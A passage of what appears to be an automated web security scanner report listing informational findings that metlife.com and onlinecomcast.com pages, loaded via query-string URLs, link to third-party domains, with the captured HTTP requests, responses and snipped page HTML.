Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/employee-benefits/index.html?WT.ac=GN_individual_employee-benefits
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; MetlifeSU=0; op314iqtvsnotermiqtgum=a06t0gj0t0276om0rf3g72d3b; op314iqtvsnotermiqtliid=a06t0gj0t0276om0rf3g72d3b; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935132674:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.8.9.1308935113663

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:37 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:32 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 44755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1524815;type=about603;cat=about143;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0 class="noscriptdisplay">&nbsp;</IFRAME>
...[SNIP]...
<br />Metropolitan Life Insurance Company (MLIC). Securities, including variable products, offered by MetLife Securities, Inc. (MSI), a broker/dealer (member <a href="http://www.finra.org/" target ="_blank">FINRA</a>/<a href="http://www.sipc.org/" target="_blank">SIPC</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.5.0"/></div>
...[SNIP]...
18.51. http://www.metlife.com/individual/employee-benefits/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/employee-benefits/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /individual/employee-benefits/index.html?WT.ac=GN_individual_employee-benefits HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/insurance/disability-insurance/index.html?WT.ac=GN_individual_insurance_disability-insurance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; MetlifeSU=0; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935130100:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.7.9.1308935113663

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:33 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:29 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 42736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.5.0"/></div>
...[SNIP]...
18.52. http://www.metlife.com/individual/insurance/disability-insurance/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/insurance/disability-insurance/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /individual/insurance/disability-insurance/index.html?WT.ac=GN_individual_insurance_disability-insurance HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html?hp-premium=MjI1Ljcy&otherParam=QUx8MzAwMDAwfDIwfFllc3xFfE18My00LTE5NjA=&pageFrom=MLLP_term-life-quote-tool
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MetlifeSU=0; op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935117304:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.6.9.1308935113663

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:32 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:28 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 111286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
<div id="ctBanner">
<a target="_blank" onClick="doLink('TaggingMetaData:banner;bannerTitle:Disability Insurance Overview - Calculator - Banner;bannerId:5-48037;;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:banner;bannerTitle:Disability Insurance Overview - Calculator - Banner;bannerId:5-48037;;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp"><img src="/assets/ib/insurance/disability/individual-disability-calc.jpg" alt="Disability Insurance - Calculator"/>
...[SNIP]...
<p><a target="_blank" onClick="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_BasicsTools;bannerId:5-23293;;url:https://intramet.investmet.com/public/doclib/LifeMarketing/Flash/DisabilityConsumer/DCBP.html;urlTarget:_blank;urlType:external;linkTitle:Disability Insurance Basics;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_BasicsTools;bannerId:5-23293;;url:https://intramet.investmet.com/public/doclib/LifeMarketing/Flash/DisabilityConsumer/DCBP.html;urlTarget:_blank;urlType:external;linkTitle:Disability Insurance Basics;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="https://intramet.investmet.com/public/doclib/LifeMarketing/Flash/DisabilityConsumer/DCBP.html">Disability Insurance Basics</a>
...[SNIP]...
<br /><a target="_blank" onClick="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_BasicsTools;bannerId:5-23293;;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:Disability Calculator;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_BasicsTools;bannerId:5-23293;;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:Disability Calculator;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp">Disability Calculator</a>
...[SNIP]...
<p>To get an estimate of how much disability income insurance you would need to maintain your current standard of living, visit our <a target="_blank" onClick="doLink('TaggingMetaData:link;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:Disability Needs Calculator;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:link;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:Disability Needs Calculator;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp">Disability Needs Calculator</a>
...[SNIP]...
ty's disability rules are different from those of other government or private programs. For more information on Social Security Disability benefits eligibility criteria, you may visit their website at <a target="_blank" onClick="doLink('TaggingMetaData:link;url:http://www.ssa.gov/;urlTarget:_blank;urlType:external;linkTitle:wwwssagov;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:link;url:http://www.ssa.gov/;urlTarget:_blank;urlType:external;linkTitle:wwwssagov;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="http://www.ssa.gov/">www.ssa.gov</a>
...[SNIP]...
</sup> Visit the easy-to-use <a target="_blank" onClick="doLink('TaggingMetaData:link;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:Disability Needs Calculator;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:link;url:http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp;urlTarget:_popup;urlType:external;linkTitle:Disability Needs Calculator;popupparams:[width=792,height=890,scrollbars=yes];siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="http://www.metlifeiseasier.com/disabilitycalculator/calc_step1.asp">Disability Needs Calculator</a>
...[SNIP]...
</sup> 2010, Social Security Administration Web site, <a href="http://www.socialsecurity.gov/pubs/10029.html" target="_blank">http://www.socialsecurity.gov/pubs/10029.html</a>
...[SNIP]...
<br />
Visit the <a target="_blank" onClick="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_WellnessCenter;bannerId:5-23664;;url:https://members.mhn.com/external/public/default/login?loginMethod=companyLogin&companyCode=metlifeweb;urlTarget:_blank;urlType:external;linkTitle:Wellness Center;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_WellnessCenter;bannerId:5-23664;;url:https://members.mhn.com/external/public/default/login?loginMethod=companyLogin&companyCode=metlifeweb;urlTarget:_blank;urlType:external;linkTitle:Wellness Center;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="https://members.mhn.com/external/public/default/login?loginMethod=companyLogin&companyCode=metlifeweb">Wellness Center</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.5.0"/></div>
...[SNIP]...
18.53. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/insurance/life-insurance/hp-life-insurance-quote.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /individual/insurance/life-insurance/hp-life-insurance-quote.html?hp-premium=MjI1Ljcy&otherParam=QUx8MzAwMDAwfDIwfFllc3xFfE18My00LTE5NjA=&pageFrom=MLLP_term-life-quote-tool HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
Content-Length: 246
Cache-Control: max-age=0
Origin: http://www.metlife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935113655:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.5.9.1308935113663

premium-mmquote=225.72&lstPnPParameters=state%2CDOB%2Ccoverage%2Cterm%2Ctobacco%2Chealth%2Cgender%2ClStatus&quoteFrom=HP&lStatus=Q&bWFCompleted=Y&IQType=hc&state1=AL&day=3&month=4&year=1960&coverages=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:16 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:14 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 58276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.5.0"/></div>
...[SNIP]...
</script><script language="javascript" type="text/javascript" charset="utf-8" src="https://metlife.inq.com/chatskins/launch/inqChatLaunch313.js"> &nbsp;</script>
...[SNIP]...
18.54. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html?RemoteUser=173.193.214.243-1234505376.30151644 HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935068484:ss=1308935068484; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.1.10.1308935069

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:41 GMT
Server: IBM_HTTP_Server
Product-Version: 1.3.02, Revision 842
Cache-Control: no-cache="set-cookie, set-cookie2"
Last-Modified: Thu, 16 Jun 2011 16:52:37 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Product: Tridion R5.3 Dynamic Content Web Application
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 89739



...[SNIP]...
</span>
<a target="_blank" onClick="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_FacebookRR;bannerId:5-33248;;url:http://facebook.com/metlife;urlTarget:_blank;urlType:external;linkTitle:;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" onKeyPress="doLink('TaggingMetaData:banner;bannerTitle:PRO_PRO_FacebookRR;bannerId:5-33248;;url:http://facebook.com/metlife;urlTarget:_blank;urlType:external;linkTitle:;popupparams:;siteEdit:;Segments1:;Segments2:;Segments3:;Segments4:');return(false);" href="http://facebook.com/metlife"><img src="/assets/facebook/FB_RR_Promo.gif" alt="facebook-promo-rr" height="36" width="212" title="facebook-promo-rr" style="WIDTH: 212px; HEIGHT: 36px"/>
...[SNIP]...
18.55. http://www.onlinecomcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinecomcast.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw HTTP/1.1
Host: www.onlinecomcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: WebsiteAliasID=2720; domain=www.onlinecomcast.com; path=/
Set-Cookie: strRefer=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: strEntryURL=http://www.onlinecomcast.com/default.aspx?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: AffID=1092; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: SubID=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: Promo=G-1092; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: Referrer=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: EntryURL=http://www.onlinecomcast.com/default.aspx?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: CampaignID=20134; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:30:11 GMT
Content-Length: 79956


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Comcast Cabl
...[SNIP]...
</script><link type="text/css" rel="stylesheet" href="http://themes.saveology.com/OnlineComcast/css/style.css" /><link rel='canonical' href='http://www.onlinecomcast.com/' />
...[SNIP]...
<a href="/"><img src="http://themes.saveology.com/OnlineComcast/images/logo.gif" alt="Comcast" class="left" /></a>
<div class="saveology">
<img src="http://themes.saveology.com/OnlineComcast/images/saveology-logo.gif" alt="Saveology.com - We Compare, You Save! " />
</div>
...[SNIP]...
<a href="/customer-service.aspx" onclick="window.open(this,'pop','width=600,height=180,scrollbars=yes');return false;">
<img src="http://themes.saveology.com/OnlineComcast/images/click.gif" alt="Contact our Representatives" /></a>
...[SNIP]...
<a href="/special-offers.html" onclick="window.open(this,'pop','width=675,height=670,scrollbars=yes');return false;">
<img src="http://themes.saveology.com/OnlineComcast/images/Router_homebanner.png" />
</a>
...[SNIP]...
<div class="offerbox2">
<img src="http://themes.saveology.com/OnlineComcast/images/icon-tv.jpg" alt="Xfinity Digital Cable TV Offers - Order Online! " />
<div class="title">
...[SNIP]...
<div class="offerbox2">
<img src="http://themes.saveology.com/OnlineComcast/images/icon-internet.jpg" alt="High Speed Internet Deals With Speeds Up To 15Mbps!" />
<div class="title">
...[SNIP]...
<div class="offerbox2">
<img src="http://themes.saveology.com/OnlineComcast/images/icon-phone.jpg" alt="Comcast Phone Services - Unlimited Nationwide Long Distance and More! " />
<div class="title">
...[SNIP]...
</div>
<img src="http://themes.saveology.com/OnlineComcast/images/icon-triple.jpg" alt="Get The Best Comcast Triple Play Deals" />
<div class="title">
...[SNIP]...
<!-- Tooltip stuff -->
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/2.7.0/build/container/assets/container.css">

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/animation/animation-min.js"></script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/container/container-min.js"></script>
...[SNIP]...
<!-- Begin keymetric include script -->
<SCRIPT TYPE="text/javascript" SRC="http://km5002.keymetric.net/KeyMetric.js"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style=" border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/989573208/?label=HjeCCMjOkgIQ2ODu1wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
<div id="dvGuestFooterContainer">
<script src="http://themes.saveology.com/OnlineComcast/javascript/msoBuyFlow.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://network.saveology.com/cable-affiliate-program.aspx" target="_blank"">
Cable Affiliate Program</a>
...[SNIP]...
</ul>
<img src="http://themes.saveology.com/OnlineComcast/images/xfinity.jpg" alt="Comcast introduces Xfinity" class="footer-logo" />
<p class="xfinity">
<a href="http://www.xfinityonline.com/" target="_blank">Comcast introduces XFINITY</a>
...[SNIP]...
18.56. http://www.phuket-travel.com/nightlife/fantasea.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /nightlife/fantasea.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nightlife/fantasea.htm?pid=AWDINP1356 HTTP/1.1
Host: www.phuket-travel.com
